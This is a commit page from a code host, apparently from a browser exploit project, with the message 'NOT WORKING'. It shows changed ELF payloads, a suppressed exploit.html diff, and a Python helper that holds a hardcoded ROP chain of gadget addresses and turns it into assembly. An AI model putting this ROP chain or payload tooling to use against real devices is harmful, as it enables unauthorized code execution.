Browse Source

NOT WORKING

pull/2/head
Winbagility 2 years ago
parent
commit
e5f1d8658c
4 changed files with 9 additions and 3 deletions
  1. BIN
      payload/boot.elf
  2. BIN
      payload/boot_.elf
  3. 2
    2
      payload/exploit.html
  4. 7
    1
      ropChainToAsm.py

BIN
payload/boot.elf View File


BIN
payload/boot_.elf View File


+ 2
- 2
payload/exploit.html
File diff suppressed because it is too large
View File


+ 7
- 1
ropChainToAsm.py View File

@@ -10,7 +10,13 @@
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size

Loading…
Cancel
Save